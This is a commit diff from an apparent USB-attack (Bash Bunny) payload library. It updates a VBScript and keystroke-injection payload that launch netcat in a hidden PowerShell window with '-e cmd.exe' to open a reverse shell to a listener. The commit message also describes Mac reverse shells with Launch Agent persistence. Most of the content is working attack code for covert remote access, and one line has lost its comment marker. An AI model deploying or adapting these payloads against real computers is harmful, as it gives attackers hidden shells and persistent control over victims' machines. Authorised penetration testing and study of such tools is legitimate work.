Updated payloads for fw v1.1 (#176)

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version

payloads/library/execution/RAZ_VBScript/a.vbs

@@ -3,7 +3,7 @@ Option Explicit
 '==============================================================================
 ' Title:         a.vbs
 ' Author:        RalphyZ
-' Version:       1.0
+' Version:       1.1
 ' Target:        Windows 7+
 '
 ' Description:
@@ -16,7 +16,8 @@ Option Explicit
 ' listeners while doing a PenTest, and grab multiple reverse
 ' shells in one trip.  Uncomment that if you want the auto-increment
 '
-' Note: You must put the netcat executable in the strReverseShellPath directory
+' Note: You must put the netcat executable in the switch directory with this 
+'       script in order for it to work
 '==============================================================================
 
 ' Declare Constants
@@ -26,14 +27,11 @@ Const ForWriting = 2
 ' Declare Global Variables
 Dim strListenerPort, strNewListenerPort, strListenerIP
 Dim objFSO, objFile, strCurrentDirectory
-Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
+Dim strNetCatEXE, strListnerPortFile, strListenerIPFile
 
 ' The netcat executable name
 strNetCatEXE = "nc.exe"
 
-' The folder location
-strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
-
 ' The file containing the listener port
 strListnerPortFile = "listener_port.txt"
 
@@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt"
 ' Create a File System Object
 Set objFSO = CreateObject("Scripting.FileSystemObject")
 
-strCurrentDirectory = FindCurrentDirectory()
+' Set default value
+strCurrentDirectory = ""
+    
+' The folder location
+FindCurrentDirectory
 
 ' Read the Host IP Address (where the listener resides)
 ReadHostIP
@@ -64,20 +66,21 @@ StartNetCat
 ' Return Value: None
 ' Description: Find the netcat executable
 '==============================================================================
-Function FindCurrentDirectory
+sub FindCurrentDirectory
     Dim objDrives, d
-    
-    ' Set default return value
-    FindCurrentDirectory = ""
-    
+           
     ' Search all drives for the netcat exe
     Set objDrives = objFSO.Drives
-    For Each d in objDrives   
-        If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
-            FindCurrentDirectory =  d + strReverseShellPath        
+    For Each d in objDrives
+        If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then
+            strCurrentDirectory =  d + "\payloads\switch1\"
+            exit sub
+        ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then
+            strCurrentDirectory =  d + "\payloads\switch2\"
+            exit sub
         End if
     Next
-End Function
+End Sub
 
 '==============================================================================
 '       Name: ReadHostIP

payloads/library/execution/RAZ_VBScript/payload.txt

@@ -2,34 +2,45 @@
 #
 # Title:         RAZ_VBScript
 # Author:        RalphyZ
-# Version:       1.0
+# Version:       1.1
 # Target:        Windows 7+
 # Dependencies:  VBScript (a.vbs) in the switch folder with this file
 # 
 # Description:   Executes a VBScript, concealed in a hidden PowerShell window
 #
 # Colors:
-# Green.....................Working
-# White.....................Completed without error
-# Light-Blue (blinking).....a.vbs was not found
+# | Status     | Color                         | Description                                      |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP      | Magenta solid                 | Setting attack mode, getting the switch position | 
+# | FAIL       | Red slow blink                | Could not find the a.vbs script                  | 
+# | ATTACK     | Yellow single blink           | Running the VBScript                             | 
+# | FINISH     | Green blink followed by SOLID | Script is finished                               | 
 
-LED G
+# Magenta solid
+LED SETUP
+
+# Set the attack mode
 ATTACKMODE HID STORAGE
 
 # Get the switch position
-source bunny_helpers.sh
+GET SWITCH_POSITION
 
-# Check if a.vbs is present
-if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
-    LED B G 100
+ Check if a.vbs is present
+ if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
+    LED FAIL
     exit 1
 fi
 
+# Start the attack - yellow single blink
+LED ATTACK
+
 # Run the VBScript
 QUACK GUI r
 QUACK DELAY 100
-QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
+QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
 QUACK ENTER
 
-# Green LED for finished
-LED R G B
+
+# Green 1000ms VERYFAST blink followed by SOLID
+LED FINISH
+exit 0

payloads/library/execution/RAZ_VBScript/readme.md

@@ -0,0 +1,31 @@
+# RAZ_VBScript
+* Author: RalphyZ 
+* Version: 1.1
+* Target: Windows 7+
+* Category: Execution
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes                       |
+| ------- | ------------------------------|
+| 1.1     | Updated for firmware 1.1      |
+| 1.0     | Initial release               |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+a.vbs - VBScript to be executed in a hidden Powershell window
+
+## Description
+VBScript (a.vbs) in the switch folder with this file
+
+## Configuration
+None
+
+## Colors
+| Status    | Color                         | Description                                      |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP     | Magenta solid                 | Setting attack mode, getting the switch position | 
+| FAIL      | Red slow blink                | Could not find the a.vbs script                  | 
+| ATTACK    | Yellow single blink           | Running the VBScript                             | 
+| FINISH    | Green blink followed by SOLID | Script is finished                               |